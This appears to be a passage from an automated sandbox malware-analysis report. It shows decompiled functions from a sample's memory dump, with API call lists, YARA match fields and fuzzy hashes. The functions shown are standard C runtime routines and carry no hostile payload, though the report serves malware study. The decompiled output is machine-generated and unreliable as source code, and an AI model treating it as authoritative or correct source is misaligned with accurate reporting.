                • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0xf1d94be9
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                0x00403639
                0x00403640
                0x00403643
                0x00403647
                0x00403652
                0x0040365a
                0x00403665
                0x0040366b
                0x0040366f
                0x00403676
                0x0040367c
                0x0040367c
                0x0040367e
                0x00403683
                0x00403688
                0x00403688
                0x00403693
                0x0040369b

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0xf1d94be9
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                0x004062c0
                0x004062c7
                0x004062ca
                0x004062d3
                0x004062d8
                0x004062dd
                0x004062e2
                0x004062e5
                0x004062e7
                0x004062e7
                0x004062ec
                0x00406305
                0x0040630b
                0x00406310
                0x004063af
                0x004063b3
                0x004063b8
                0x004063b8
                0x004063cc
                0x004063d4
                0x004063d4
                0x00406316
                0x00406319
                0x0040631e
                0x00406322
                0x0040636e
                0x00406370
                0x00406372
                0x00406377
                0x0040638e
                0x00406396
                0x004063a6
                0x004063a6
                0x00406396
                0x004063a8
                0x004063a9
                0x00000000
                0x004063ae
                0x00406324
                0x00406329
                0x0040632b
                0x0040632d
                0x0040632d
                0x00406335
                0x00406352
                0x0040635c
                0x00406361
                0x00000000
                0x00000000
                0x00406363
                0x00406369
                0x00406369
                0x00000000
                0x00406369
                0x00406339
                0x0040633d
                0x00406342
                0x00406346
                0x00000000
                0x00000000
                0x00406348
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x587c30
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







                0x00409be4
                0x00409bf1
                0x00409bf7
                0x00409bff
                0x00409c0d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00409c15
                0x00409c15
                0x00409c17
                0x00409c29
                0x00000000
                0x00000000
                0x00409c2b
                0x00409c3b
                0x00000000
                0x00000000
                0x00409c43
                0x00409c45
                0x00409c46
                0x00409c5e
                0x00409c65
                0x00000000
                0x00409c73
                0x00000000
                0x00409c6e
                0x00409bff
                0x00409bf3
                0x00409bf3
                0x00000000

                APIs
                • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
                • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
                • __dosmaperr.LIBCMT ref: 00409C68
                Strings
                Memory Dump Source
                • Source File: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CloseErrorHandleLast__dosmaperr
                • String ID: 0|X
                • API String ID: 2583163307-1024512958
                • Opcode ID: f0f4e4d222caa73ee9a0f3d5fe9adb322dbc8770ca6fb4bd57fc01b4641c9a56
                • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
                • Opcode Fuzzy Hash: f0f4e4d222caa73ee9a0f3d5fe9adb322dbc8770ca6fb4bd57fc01b4641c9a56
                • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xf1d94bea
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                0x00405756
                0x0040575a
                0x00405761
                0x00405765
                0x00405773
                0x00405789
                0x0040578d
                0x004057b6
                0x004057b8
                0x004057bc
                0x004057bf
                0x004057bf
                0x004057c5
                0x004057c7
                0x00000000
                0x004057c8
                0x0040578f
                0x00405798
                0x004057a7
                0x0040579a
                0x0040579d
                0x004057a3
                0x004057a3
                0x004057ab
                0x00000000
                0x004057ad
                0x004057b0
                0x004057b2
                0x00000000
                0x004057b2
                0x004057ab
                0x00405767
                0x0040576c
                0x00000000

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                0x00404320
                0x00404320
                0x00404320
                0x0040432a
                0x0040432c
                0x00404331
                0x00404334
                0x00404342
                0x00404349
                0x0040434e
                0x00404351
                0x00404354
                0x00404366
                0x0040436b
                0x0040436d
                0x00404378
                0x0040437f
                0x00404384
                0x00404387
                0x00404389
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040436f
                0x0040436f
                0x00000000
                0x0040436f
                0x00404356
                0x00404356
                0x00404357
                0x00404357
                0x0040435c
                0x00404397
                0x00404398
                0x0040439e
                0x004043a3
                0x004043a6
                0x004043a7
                0x004043a8
                0x004043af
                0x004043b1
                0x004043b3
                0x004043b8
                0x004043bb
                0x004043c9
                0x004043d5
                0x004043d8
                0x004043db
                0x004043ed
                0x004043f2
                0x004043f4
                0x004043ff
                0x00404405
                0x0040440d
                0x0040440f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004043f6
                0x004043f6
                0x00000000
                0x004043f6
                0x004043dd
                0x004043dd
                0x004043de
                0x004043de
                0x00404411
                0x00404412
                0x00404412
                0x004043bd
                0x004043c3
                0x004043c7
                0x0040441a
                0x0040441b
                0x00404421
                0x00000000
                0x00000000
                0x00000000
                0x004043c7
                0x00404428
                0x00404428
                0x00404336
                0x0040433c
                0x00404340
                0x0040438b
                0x0040438c
                0x00404396
                0x00000000
                0x00000000
                0x00000000
                0x00404340

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                0x004025ba
                0x004025bf
                0x004025cb
                0x004025d0
                0x004025d5
                0x004025d7
                0x004025e2
                0x004025d9
                0x004025d9
                0x00000000
                0x004025d9
                0x004025cd
                0x004025cd
                0x004025cf
                0x004025cf

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}



                0x0040557b
                0x00405586
                0x0040558d

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CommandLine
                • String ID: 3W
                • API String ID: 3253501508-3847566843
                • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                Uniqueness

                Uniqueness Score: -1.00%